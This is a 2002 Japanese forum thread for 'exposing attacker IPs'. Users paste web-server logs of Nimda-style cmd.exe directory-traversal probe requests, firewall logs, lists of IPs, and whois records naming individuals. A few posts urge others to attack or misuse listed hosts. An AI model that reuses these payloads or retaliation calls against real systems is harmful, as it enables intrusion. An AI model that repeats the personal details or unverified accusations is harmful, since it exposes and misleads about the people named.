アタッカーのIPを晒す

アタッカーのIPを晒してしまうスレ

61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283
61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"
61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281
61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-"
61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-" "-"
61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322
61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" "-"
61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322
61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" "-"

ウザすぎ！！！

(　´_ゝ｀)ﾌｰﾝ

こいつぁ、事件だぜ！

■■■■■■■■■■■■糸冬 了■■■■■■■■■■■■

>>1
あ、ごめん。。そのIP俺のおかんだわ。

>>1
質問スレなら即レスしたのに。
http://pc.2ch.net/test/read.cgi/sec/1029675971/l50

いとふゆ

61.205.103.31 - - [02/Sep/2002:20:52:46 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-"
61.205.103.31 - - [02/Sep/2002:20:52:47 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
61.205.103.31 - - [02/Sep/2002:20:52:47 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
61.205.103.31 - - [02/Sep/2002:20:52:49 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
61.205.103.31 - - [02/Sep/2002:20:52:49 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
61.205.103.31 - - [02/Sep/2002:20:52:51 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
61.205.103.31 - - [02/Sep/2002:20:52:51 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-" "-"
61.205.103.31 - - [02/Sep/2002:20:52:52 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322
61.205.103.31 - - [02/Sep/2002:20:52:52 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" "-"
61.205.103.31 - - [02/Sep/2002:20:52:54 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322
61.205.103.31 - - [02/Sep/2002:20:52:54 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" "-"
61.205.103.31 - - [02/Sep/2002:20:52:56 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
61.205.103.31 - - [02/Sep/2002:20:52:56 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338 "-" "-"

>>1
それを晒してなんの意味があるわけ？
しかもわざわざスレまで立てて。
自己満足？
そういうのは脳内だけでやってね

このIPアドレスやばくない？晒していいのかな

■皆さん!ハッカー攻撃どのくらい来ますか?Part2■ http://pc.2ch.net/test/read.cgi/sec/1030548767/l50
クラックしかけてくる奴の国名ランキング(日本除く) http://pc.2ch.net/test/read.cgi/sec/1005488998/l50
【犯罪者予備軍リスト】 ttp://pc.2ch.net/test/read.cgi/sec/1029392996/l50
Packet sent from San Francisco:-) ttp://pc.2ch.net/test/read.cgi/sec/1028461839/l50

アタッカー


晒しあげ

nimdaじゃん

削除依頼済

どこから繋げているかを
どこで調べるの？
218.216.226.25

NTT

中部ケーブルネットワーク株式会社

>>14
串

みんなありがとう。
POP3に見知らぬIPがあったので調べてみると
元カノでした（怖

■皆さん!ハッカー攻撃どのくらい来ますか?Part2■
http://pc.2ch.net/test/read.cgi/sec/ 1030548767/l50
クラックしかけてくる奴の国名ランキング(日本除く)
http://pc.2ch.net/test/read.cgi/sec/ 1005488998/l50
【犯罪者予備軍リスト】 ttp://pc.2ch.net/test/read.cgi/sec/1029392996/l50
Packet sent from San Francisco:-)
ttp://pc.2ch.net/test/read.cgi/sec/1028461839/l50

■■■■■■■■■■■■　終了　■■■■■■■■■■■■

あたっく〜　あたっく〜　











終わり

IP Address List HostName Aliases

218. 43. 59. 19 p7019-adsao02yokoni-acca.kanagawa.ocn.ne.jp


はいよ

アタックだと勘違いして妄想を書き込むスレはここですか？

http://211.13.205.135
↑ここだ！

サイトまでもってやがる！！
しかも18禁だ！！
･･･ｺﾞﾒﾝﾅｻｲ。。

IP: 210.197.82.66
DNS: c82066.tctv.ne.jp

IP: 210.197.82.133
DNS: c82133.tctv.ne.jp

n08-170.ip-tokyo.highway.ne.jp 誰？

２０３．１４１.１３６．３

晒しage

寝言は寝てから言うもんだがな？？？

２１９．４８．２１２．３０に注意！！とろいの木馬さんを送ってきます

>>28
無知は早く氏ね

早とちりはイカン

192.168.0.1

おまいら
どんなアタックなのかも書き込め。

>>31
ローカルアドレスだけど

Personal Information: [個人情報]
a. [JPNICハンドル] YK7789JP
b. [氏名] 木村 保博
c. [Last, First] Kimura, Yasuhiro
d. [電子メイル] [email protected]
f. [組織名] ファストネット株式会社
g. [Organization] FastNet,Inc.
k. [部署] インターネット事業部 インターネット技術推進部
l. [Division] Internet Technology Promotion Div. Internet Business Group
m. [肩書]
n. [Title]
o. [電話番号] XXXXXXXXXX
p. [FAX番号] XXXXXXXXXX
y. [通知アドレス] [email protected]
[最終更新] 2001/09/14 16:04:53 (JST)
[email protected]


コイツちょこちょこハッキングしてくる。ウザイ。晒す。

>>1の鯖ってさ、クレズとか受け入れちゃったんだね(稿)
管理責任能力が欠如してるんだろう(劇稿)
Apacheのログなんか見せて喜んでるアフォは沈んどけ(晒し上げ)

あげ荒らしが頻発の為、運営側と相談中。
■■■■■■■■終了■■■■■■■■

210.197.83.196, c83196.tctv.ne.jp

\\219.25.26.18\SharedDocs\

踏み台にされてる香具師だっているんだぞ！
晒すな！！　ｷﾁｶﾞｲども！

>>1
こういう情報は公開されてます

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.205.113.0-61.205.119.0
b. [ネットワーク名] K-OPTICOM
f. [組織名] 株式会社ケイ・オプティコム
g. [Organization] K-Opticom Corporation
m. [運用責任者] KH4246JP
n. [技術連絡担当者] YI4008JP
p. [ネームサーバ] ns1.eonet.ne.jp
p. [ネームサーバ] ns2.eonet.ne.jp
y. [通知アドレス] [email protected]
[割当年月日] 2001/09/26
[最終更新] 2002/02/01 10:07:57 (JST)
[email protected]

217.98.209.11
これは串ですかね？

日付: 2002/09/30 時刻: 21:40:51
ｱﾄﾞﾚｽ 218.120.90.35 からの不正侵入の試みを規則 Portal of Doom ﾄﾛｲの木馬のﾃﾞﾌｫﾙﾄ遮断 によって検出しました｡
以降のｱｸｾｽを 30 分間遮断しました｡

ここ20日ほどうざいので晒しあげ。

Security Violations
=-=-=-=-=-=-=-=-=-=
Sep 30 17:43:04 myhost in.ftpd[11280]: refused connect from 210.3.205.65
Sep 30 17:46:16 myhost in.ftpd[11286]: refused connect from 210.3.205.65
Sep 30 17:47:37 myhost in.ftpd[11292]: refused connect from 210.3.205.65
Sep 30 17:48:06 myhost in.ftpd[11298]: refused connect from 210.3.205.65
Sep 30 17:48:28 myhost in.ftpd[11304]: refused connect from 210.3.205.65
Sep 30 17:48:49 myhost in.ftpd[11310]: refused connect from 210.3.205.65
Sep 30 17:49:08 myhost in.ftpd[11316]: refused connect from 210.3.205.65
Sep 30 17:49:33 myhost in.ftpd[11322]: refused connect from 210.3.205.65
Sep 30 17:50:22 myhost in.ftpd[11330]: refused connect from 210.3.205.65
Sep 30 17:51:15 myhost in.ftpd[11336]: refused connect from 210.3.205.65
Sep 30 17:51:45 myhost in.ftpd[11342]: refused connect from 210.3.205.65
Sep 30 17:52:17 myhost in.ftpd[11348]: refused connect from 210.3.205.65
Sep 30 17:52:47 myhost in.ftpd[11354]: refused connect from 210.3.205.65
途中略
Sep 30 17:55:32 myhost in.ftpd[11384]: refused connect from 210.3.205.65
Sep 30 17:55:58 myhost in.ftpd[11390]: refused connect from 210.3.205.65
Sep 30 17:56:26 myhost in.ftpd[11396]: refused connect from 210.3.205.65
Sep 30 17:56:56 myhost in.ftpd[11402]: refused connect from 210.3.205.65
Sep 30 17:58:20 myhost in.ftpd[11408]: refused connect from 210.3.205.65
Sep 30 17:58:46 myhost in.ftpd[11414]: refused connect from 210.3.205.65
Sep 30 17:59:22 myhost in.ftpd[11420]: refused connect from 210.3.205.65
Sep 30 17:59:54 myhost in.ftpd[11426]: refused connect from 210.3.205.65
Sep 30 18:00:22 myhost in.ftpd[11434]: refused connect from 210.3.205.65
Sep 30 18:00:50 myhost in.ftpd[11440]: refused connect from 210.3.205.65

今調べたら、ここ踏み台にされてるな。
いつまでもほっとくなよ、管理者。

ftpd,rpc,apache,mod_ssl,php,openssh,cgi　どれもだめじゃん。

146.245.2.221

210.156.65.118

127.0.0.2

>>47
ネタ

192.168.0.1

0120.333.333

24.194.183.92
臭ってくんだよ・・
こいつのおかげで部屋がくさい

よくわからんが、
refused connect from [email protected]
とかいうのは、外部からなんかしようとしてるヤツがいる、と考えていいの？

あたっく〜　　あたっく〜


はっか〜　　こわい〜


IPを〜　さらすぜ〜　IPが〜　わかれば〜　なんでも〜

出来ちゃうんだぞ〜　トロイの木馬を〜　送るんだ〜

>>50
ﾜﾗﾀ
お前天災

152.163.213.238
64.12.128.18
64.12.128.14
205.188.193.229
152.163.207.230
205.188.193.91
205.188.197.106

205.188.198.105
64.12.101.232
64.12.107.104
210.57.155.34
205.188.193.110
207.188.7.80

169.254.159.252
131.234.25.25
202.1.237.109
218.1.64.59
202.103.30.73
61.145.116.138
61.135.129.65
152.163.213.220
130.94.92.107
152.63.53.250

202.188.53.25
205.188.193.92
152.163.213.231
152.63.53.250
152.63.50.193
152.63.55.114
172.16.20.6

台湾とかブラジルとかイタリアとかシンガポールとか
イスラエルとかアメリカとかフランスとかから来るのは
ワールドカップ関連のサイトをサーフィンしたせいかなぁ。
それとﾏｶｰにexeとか送るのやめてね?･ｳｻﾞｲから。

姉さん事件です！

211.133.144.18
TCP act packet attack
これは串ですか？

>>61
http://taruo.net/
の診断くんで調べてみたら?

>>62
IPを調べてみたら
株式会社ジンオフィスサービス という会社から
アタックされてることが判明しました。
さらに
61.121.253.63
バリュークリックジャパンというところからも
TCP ack packet attackという攻撃をされた事
がログに残ってました。
企業が個人に攻撃するなんて事はあるんですかね？

>>63
ttp://jbbs.shitaraba.com/sports/901/
ここ↑に沢山居ます☆

なあ、



　　　　　　な　ん　で　「　攻　撃　」　な　ん　だ　？

[回避] 攻撃者は、TCP 接続のハイジャックを試みている可能性があります。
IP: 210.239.44.44
DNS: ss09.estore.co.jp
株式会社イーストアー
http://www.estore.co.jp/

ハイジャックと来ましたか
最近のPFWは語彙が豊かでイイね
その分実際に何が行われたかがきちんと伝えられず、不安を煽られる厨房が多いけど

192.168.0.1

clock.nc.fukuoka-u.ac.jp (133.100.9.2):ntp123

さっき福岡大学からトロイの侵入があった・・・。

>>69
ﾜﾛﾀ

>>69
たぶん時計の時刻がハッキングされてるぞ！

経営しているHPに、WEBAUTOというソフトをつかって、ずーっと
アタックして、カウンターCGIに負荷かけていあるアフォが
きました。↓生IPでやっている。

218.218.156.254

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 218.218.0.0-218.218.255.0
b. [ネットワーク名] ODN
f. [組織名] オープンデータネットワーク(日本テレコム株式会社)
g. [Organization] Open Data Network(JAPAN TELECOM CO.,LTD.)
m. [運用責任者] YN234JP
n. [技術連絡担当者] YN234JP
p. [ネームサーバ] ns1.dhs.jtidc.jp/218.218.247.0
p. [ネームサーバ] ns1.v6.odn.ne.jp/218.218.252.0
p. [ネームサーバ] ns2.dhs.jtidc.jp/218.218.247.0
p. [ネームサーバ] ns2.odn.ne.jp/218.218.0.0-218.218.246.0
p. [ネームサーバ] ns2.odn.ne.jp/218.218.248.0-218.218.251.0
p. [ネームサーバ] ns2.odn.ne.jp/218.218.253.0-218.218.255.0
p. [ネームサーバ] ns2.v6.odn.ne.jp/218.218.252.0
p. [ネームサーバ] ns4.odn.ne.jp/218.218.0.0-218.218.246.0
p. [ネームサーバ] ns4.odn.ne.jp/218.218.248.0-218.218.251.0
p. [ネームサーバ] ns4.odn.ne.jp/218.218.253.0-218.218.255.0
y. [通知アドレス] [email protected]
[割当年月日] 2002/01/22
[最終更新] 2002/08/08 14:50:12 (JST)
[email protected]

昨日晩より頻繁にアタックされるようになりました。
218.232.110.135
210.136.232.249
194.135.19.40
81.23.228.65.
61.121.253.68
今まで一度も無かったのになんだか怖いです・・・
ルーターかましてても駄目なんですかね？

いまだにwhois貼り付けてるバカいるんだな

yahoobb219185148055.bbtec.net
ppp0113.hakata01.bbiq.jp

こいつらうぜえ・・・
特にAhooの香具師。
2時間に200回以上検出されてる。

61.126.200.32
61.25.50.149
いやー、ログみたらお腹いっぱい。
netbus　netspy　girlfrend、、、
なつかしいトロイの祭り。ｗ

216.87.73.170

あぼーん

>>78
通報しますた

218-163-174-144.HINET-IP.hinet.net

210.230.244.22

telnet　23　･･････って、おぃおぃ、IP打ち間違えたか?

お初です。
一連のスレッドがありますた。
白血病と果敢に闘い、無念にも亡くなった２ちゃんねらのスレです。

医者ってさ・・・
http://ton.2ch.net/hosp/kako/1014/10141/1014187303.html
無菌の国のナディア
http://page.freett.com/dat2ch/021010-1016126461.html
（わしの作った電波２ちゃんのスナップショット）
http://dempa.2ch.net/dat/2002/10/hosp-1016126461.html

何故なのか、彼のＨＰのBBSが荒らされています。
（http://www.eurus.dti.ne.jp/~yoyoyo/）

投稿者 残念だったなLEONHARD　 投稿日 19 Oct 2002 08:51:27
投稿者 残念だったなLEONHARD　 投稿日 19 Oct 2002 08:51:21
投稿者 残念だったなLEONHARD　 投稿日 19 Oct 2002 08:51:16
投稿者 残念だったなLEONHARD　 投稿日 19 Oct 2002 08:51:11
投稿者 残念だったなLEONHARD　 投稿日 19 Oct 2002 08:51:05
投稿者 残念だったなLEONHARD　 投稿日 19 Oct 2002 08:51:00

これの羅列です。ご親族も見ておられるのに・・・
こちらにお邪魔するのは初めてです。おまけにスレ違いかもしれません。
しかし、苦しい治療に耐えて耐えてそのあげく死んでしまった>>1にはむごすぎる仕打ちです。
できましたら、この荒らしやさんのIP晒してください。
責任や民法・刑事的罰は全て私が受けます。
また、もし、ここではスレ違いでしたら、申し訳ないのですが、適切なスレに誘導下さい。

>>82の書き込みの者です。
先程は>>1への感情が先走って、お願い事をしてしまいました。
掲示板の方は荒らしている方を非難するつもりはなく前向きにいこうと言うことでした。
ご迷惑をおかけして申し訳ありませんでした。

ただ、私個人としては、復讐などするつもりはありません。
”誰がやったのか”が知りたいだけなのです。

>>◆BonkFKHXWw

BBSの方を拝見させて頂きましたが、管理者権限で投稿者のIP、ホストを表示出来るタイプのBBSの様ですので。

ご遺族の方々と協力さえすれば、荒しをした方の(その当時の)IPは判明するかと思われます。
しかし、IPが判ったからといって、その個人を特定出来るとは限りませんので、その辺りをご理解頂けます様、お願い致します。

また、このスレはアタッカー(クラックor特定の攻撃意図を持った者)のIPを晒すスレですので、今後は別スレでお願いします。

inetnum: 66.0.0.0 - 66.255.255.255
netname: IANA-NETBLOCK-66
country: AU
address: see http://www.iana.org.
e-mail: [email protected]

>>85さん、
ありがとうございました。
ただ、ダウソ板初めてのものなので、
＞後は別スレで
といわれてもどこにいけばいいかわかりましぇん（泣）
ご迷惑ついでに、誘導おながいします。

80.11.164.118

YahooBB219185016097.bbtec.net
xdsl027171.061200.metallic.ne.jp

147.208.171.140

こいつから、１５０以上のアタックをされています。こいつは、創価学会員です。あいつらは、本当にやり口が汚いよ。

あなたが検索されたIPアドレス［ 147.208.171.140 ］の企業名・団体名は以下の通りです。
Intel Corporation INTEL-FSO (NET-147-208-0-0-1)
147.208.0.0 - 147.208.255.255
Symantec Corporation SYMANTEC-INTELONLINE (NET-147-208-171-128-1)
147.208.171.128 - 147.208.171.191

Domain servers in listed order:

DNS03.BBTEC.NET 43.224.255.3
DNS04.BBTEC.NET 43.224.255.4
DNS06.BBTEC.NET 43.231.251.96

うざい！
OrgName: ChungNam National University
OrgID: CNU

NetRange: 168.188.0.0 - 168.188.255.255
CIDR: 168.188.0.0/16
NetName: CHUNGNAM
NetHandle: NET-168-188-0-0-1
Parent: NET-168-0-0-0-0
NetType: Direct Assignment
NameServer: BAEKMA.CHUNGNAM.AC.KR
NameServer: NS.KREN.NM.KR
Comment:
RegDate: 1994-06-07
Updated: 1996-05-03

TechHandle: HK283-ARIN
TechName: Kisun, Han
TechPhone: +82-42-821-6055
TechEmail: [email protected]

>>93
Whois貼り付けんな、ボケ

>>94
黙れカス！

(´-`).｡oO(まだWhois貼り付けて喜ぶﾔｼいるんだ…)

(´-`).｡oO(大体踏み台かもしれないのに・・・・・)

サーバのport23(telnet)にずーっと攻撃かけてくるこのヴァカは誰だ？
12.249.18.25[12-249-18-25.client.attbi.com]

…っておい、AT&Tかよ (@_@)?!!

YahooBB218141016006.bbtec.net
多分踏み台なんだろうけどなぁ・・・

100

頻繁にノートンが警告してきます。
なんなのでしょうか？

202.248.20.208

来る日も来る日もNetBIOS〜〜
ＩＰ晒すにしても多すぎて無理〜〜♪

dns30.bbtec.net(218.176.253.82)

ページ移動するたびに出てくるんで気持ち悪いです。

200.64.172.123
212.30.93.79
18.11.95.172
213.169.247.76
64.125.31.82.

>>103
お前YahooBBユーザーだろ(ｗ

Whoisってなんですか？

>>106
駄目な例
・検索という言葉を知らない。

リモートアドレス:KFZFXOAKWEL3QDZ（192.168.0.3）:3987
ローカルアドレス:KFZFXOAKWEL3QDZ（192.168.0.3）:ssdp

>>108
お前のパソコンのローカルアドレス

今日の
ｳｲﾙｽﾊﾞｽﾀｰ2002 ﾛｸﾞ ﾘｽﾄ
種類,時刻,受信/送信,ﾌﾟﾛﾄｺﾙ,送信元IPｱﾄﾞﾚｽ,送信元ﾎﾟｰﾄ,送信先IPｱﾄﾞﾚｽ,送信先ﾎﾟｰﾄ,説明
ﾌｧｲｱｳｫｰﾙ,14:49:50,受信,ICMP,211.14.14.126,N/A,192.168.0.2,N/A,Smurf,
ﾌｧｲｱｳｫｰﾙ,14:49:55,受信,ICMP,210.153.89.246,N/A,192.168.0.2,N/A,Smurf,
ﾌｧｲｱｳｫｰﾙ,14:49:58,受信,ICMP,211.14.12.11,N/A,192.168.0.2,N/A,Smurf,

10/19日の
ｳｲﾙｽﾊﾞｽﾀｰ2002 ﾛｸﾞ ﾘｽﾄ
種類,時刻,受信/送信,ﾌﾟﾛﾄｺﾙ,送信元IPｱﾄﾞﾚｽ,送信元ﾎﾟｰﾄ,送信先IPｱﾄﾞﾚｽ,送信先ﾎﾟｰﾄ,説明
ｸﾛｰｷﾝｸﾞ,01:14:39,受信,UDP,210.81.153.192,5000,192.168.0.2,5000,Cloaking,
ｸﾛｰｷﾝｸﾞ,01:14:49,受信,UDP,210.81.153.192,5000,192.168.0.2,5000,Cloaking,
ｸﾛｰｷﾝｸﾞ,01:14:49,受信,UDP,210.81.153.192,5000,192.168.0.2,5000,Cloaking,
ｸﾛｰｷﾝｸﾞ,01:14:54,受信,UDP,210.81.153.192,5000,192.168.0.2,5000,Cloaking,
ｸﾛｰｷﾝｸﾞ,01:14:54,受信,UDP,210.81.153.192,5000,192.168.0.2,5000,Cloaking,
ｸﾛｰｷﾝｸﾞ,01:14:54,受信,UDP,210.81.153.192,5000,192.168.0.2,5000,Cloaking,
ｸﾛｰｷﾝｸﾞ,01:14:54,受信,UDP,210.81.153.192,5000,192.168.0.2,5000,Cloaking,
ｸﾛｰｷﾝｸﾞ,01:14:54,受信,UDP,210.81.153.192,5000,192.168.0.2,5000,Cloaking,
ｸﾛｰｷﾝｸﾞ,01:14:54,受信,UDP,210.81.153.192,5000,192.168.0.2,5000,Cloaking,
ｸﾛｰｷﾝｸﾞ,01:14:55,受信,UDP,210.81.153.192,5000,192.168.0.2,5000,Cloaking,
（以下略

これ何？

うおおーーーっ！！
ファイヤーウォールのパワーを全開だ！！

俺のＰＣを不正アクセスから守ってくれっ！！！

ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 211.132.156.217,nbsession(139)
誰か攻撃してやって下さい
role: Japan Network Information Center
address: Kokusai-Kougyou-Kanda Bldg 6F, 2-3-4 Uchi-Kanda
address: Chiyoda-ku, Tokyo 101-0047, Japan
country: JP
phone: +81-3-5297-2311
fax-no: +81-3-5297-2312
e-mail: [email protected]
admin-c: SN108-AP
tech-c: KS218-AP
nic-hdl: JNIC1-AP
mnt-by: MAINT-JPNIC
changed: [email protected] 19990629
changed: [email protected] 20011011
changed: [email protected] 20021018
source: APNIC

inetnum: 211.132.128.0 - 211.132.159.255
netname: XEPHION
descr: XePhion(NTT-ME Corporation)
country: JP

んだから、Whois貼るアホは帰れと、（以下略）

なんつーか、
IPアドレスから（中略）できるよーな人たちには冗長な情報なんじゃなかろーか、
とか思ったりは…しないんだろうな。
たぶん
「自分だけがこの方法を知っている！」
「IPだけじゃなく個人情報も2chに晒してる！」
と思ってたりするんだろう。

24.167.17.57

195.7.124.3

Ping Attackウザイ

>>112
つーか、不正アクセスじゃないだろ?

211.114.52.123,3799　侵入野郎
person: Heesung Yang
descr: Pongsu Primary School
descr: 284-438 KAJEONG2DONG SEOKU
descr: INCHON
descr: 404-232
country: KR
phone: +82-32-567-0282
fax-no: +82-32-567-0284
e-mail: [email protected]
nic-hdl: HY536-KR

>>118





>>113が難（むず）しくて読（よ）めないのか?

んだから、Whois（ふーいず）貼（は）るアホ（あほ）は帰（かえ）れと、（以下略（いかりゃく））

webmail.sonepar-us.com

>>120を晒しage

210.136.232.250
ad.jp.ap.valuecommerce.com

ウザ過ぎ、このインチキ会社やってくれ。

>>122
そんなとこ許可しているお前がアホ。
この板的にはFWでin,out共にブロック。

>>122










アタッカーの意味を分かって言ってるのかと（以下略

イタイ白人野郎>>121を皿仕上げ

こいつを逆にアタクしてやりたい。

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.207.0.0-61.207.255.0
b. [ネットワーク名] OCN
f. [組織名] オープンコンピュータネットワーク
g. [Organization] Open Computer Network
m. [運用責任者] AY1361JP
n. [技術連絡担当者] MO081JP
n. [技術連絡担当者] KK551JP
n. [技術連絡担当者] IM657JP
p. [ネームサーバ] ns-kg001.ocn.ad.jp/61.207.56.0-61.207.255.0
p. [ネームサーバ] ns-kn001.ocn.ad.jp/61.207.56.0-61.207.255.0
p. [ネームサーバ] ns-os001.ocn.ad.jp/61.207.0.0-61.207.37.0
p. [ネームサーバ] ns-os001.ocn.ad.jp/61.207.42.0-61.207.55.0
p. [ネームサーバ] ns-tkb01.ocn.ad.jp/61.207.38.0-61.207.41.0
p. [ネームサーバ] ns-tkb02.ocn.ad.jp/61.207.38.0-61.207.41.0
p. [ネームサーバ] pns.ocn.ad.jp/61.207.0.0-61.207.37.0
p. [ネームサーバ] pns.ocn.ad.jp/61.207.42.0-61.207.55.0
y. [通知アドレス] [email protected]
[割当年月日] 2001/05/08
[最終更新] 2002/01/28 10:53:02 (JST)
[email protected]

>>126
一つ聞きますけど、
それの意味分かってます？

>>127
絨毯爆撃でもする気なんでは。いやー勇者だねー。

218.158.93.101
から攻撃を受けますタ。韓国であるます。

あっそ

>>130
いえ、阿蘇ではございません。韓国であるます。

くっそ

フッ素

157.206.3.109通信の要求2002/10/27 9:09:18TCP(4054)
65.213.187.99通信の要求2002/10/27 9:07:03TCP(4049)
216.32.210.138通信の要求2002/10/27 9:01:10TCP(4088)
217.8.96.171通信の要求2002/10/27 8:59:59TCP(4069)
61.156.45.47通信の要求2002/10/27 8:57:35TCP(4090)
66.40.9.137通信の要求2002/10/27 8:57:03TCP(4084)
66.230.128.22通信の要求2002/10/27 8:56:57TCP(4081)
64.186.142.55通信の要求2002/10/27 8:56:46TCP(4029)

ついさっきからこいつらに激しく通信の要求されまくってる。
いやいやこまったね。

時間, イベント, 侵入者, カウント
2002/10/27 20:03:03, SubSeven port probe, 250.a.005.mel.iprimus.net.au, 3
2002/10/27 19:32:02, SubSeven port probe, sxpp-p-144-139-125-33.prem.tmns.net.au, 3
2002/10/27 19:19:05, SubSeven port probe, c17098.dandn1.vic.optusnet.com.au, 3
2002/10/27 18:55:33, Telnet port probe, 211.93.133.66, 2
2002/10/27 18:13:22, SubSeven port probe, d161-ps3-mel.alphalink.com.au, 3
2002/10/27 17:23:31, MSRPC UDP port probe, Toronto-ppp274573.sympatico.ca, 1
2002/10/27 17:13:19, SMTP port probe, 211.230.36.131, 3
2002/10/27 16:45:57, SQL port probe, adsl-64-175-194-18.dsl.lsan03.pacbell.net, 3
2002/10/27 16:21:40, FTP port probe, 211.105.32.230, 1
2002/10/27 15:02:17, SubSeven port probe, c17000.brodm1.vic.optusnet.com.au, 3
2002/10/27 13:49:33, Telnet port probe, 211.93.133.66, 2
2002/10/27 12:34:03, RPC TCP port probe, 0x50c63795.kd4nxx10.adsl-dhcp.tele.dk, 4
2002/10/27 09:21:09, TCP port probe, 202.108.254.200, 1

2002/10/27 09:21:09, Proxy port probe, 202.108.254.200, 2
2002/10/27 09:21:09, SOCKS port probe, 202.108.254.200, 1
2002/10/27 09:21:08, HTTP port probe, 202.108.254.200, 1
2002/10/27 08:48:28, FTP port probe, kiss.pl.gin.cz, 4
2002/10/27 08:32:22, FTP port probe, 210.51.248.127, 3
2002/10/27 08:13:39, FTP port probe, 61.183.172.138, 2
2002/10/27 05:00:52, FTP port probe, 62.211.49.88, 1
2002/10/27 03:16:37, SQL port probe, 195.141.157.37, 3
2002/10/27 02:21:50, FTP port probe, 210.12.186.178, 4
2002/10/27 01:17:48, HTTP port probe, 200-23-182-181.frellinux.frel.com.mx, 2
2002/10/26 23:15:48, HTTP port probe, innogate.rallis.co.in, 1
2002/10/26 22:01:15, SMTP port probe, 211.230.36.131, 3
2002/10/26 22:00:42, TCP port probe, 202.108.254.200, 1
2002/10/26 22:00:40, Proxy port probe, 202.108.254.200, 2
2002/10/26 22:00:38, SOCKS port probe, 202.108.254.200, 1

2002/10/26 22:00:35, HTTP port probe, 202.108.254.200, 1
2002/10/26 17:43:26, SQL port probe, 210006066206.ctinets.com, 3
2002/10/26 16:03:46, SQL port probe, host-216-153-146-142.spr.choiceone.net, 3
2002/10/26 15:07:31, FTP port probe, 213.236.234.140, 2
2002/10/26 14:35:04, MSRPC TCP port probe, w115.z066089005.chi-il.dsl.cnc.net, 3
2002/10/26 14:06:02, SQL port probe, sql.partypop.com, 2
2002/10/26 11:43:17, SOCKS port probe, 80.48.245.161, 1
2002/10/26 11:38:06, HTTP port probe, 210.12.214.82, 1

だから踏み台吊るして何があるのかと（以下略

>>138
踏み台として利用できることがひとめでわかって便利。

踏み台にしてこい

ちょっと待った。そもそもそういう目的のスレなんじゃないの？

>>141
○アタッカー
×踏み台

ﾌｧｲｱｳｫｰﾙは 61.213.194.75 (TCP Port 1618) [TCP Flags: S]. から、
このｺﾝﾋﾟｭｰﾀ (TCP Port 7743) への ｲﾝﾀｰﾈｯﾄ ｱｸｾｽをﾌﾞﾛｯｸしました。

61.213.194.75よ、Port総当りはやめてくれ・・・
ZoneAlarmのlogにお前のIDがいっぱいだ・・・
今はwinny起動してないぞ。

>>143
http://tmp.2ch.net/download/

tp241122.seeder.net

>>145 を晒しage

一度に２６通もウィルス届いたら、そりゃあ、泣きたくもなりますわ。
「WORM_FRETHEM.K」(フレゼムK)の対策もしていますので
送ってきても無駄です。どうせ送ってくるのは、ここの馬鹿
でしょうがいいかげんウザイです。

http://ruma.execweb.cx/murmur/index.htm

あぼーん

219.160.108. 46 p7046-ipad01koufu.yamanashi.ocn.ne.jp

219.160.108. 46 p7046-ipad01koufu.yamanashi.ocn.ne.jp

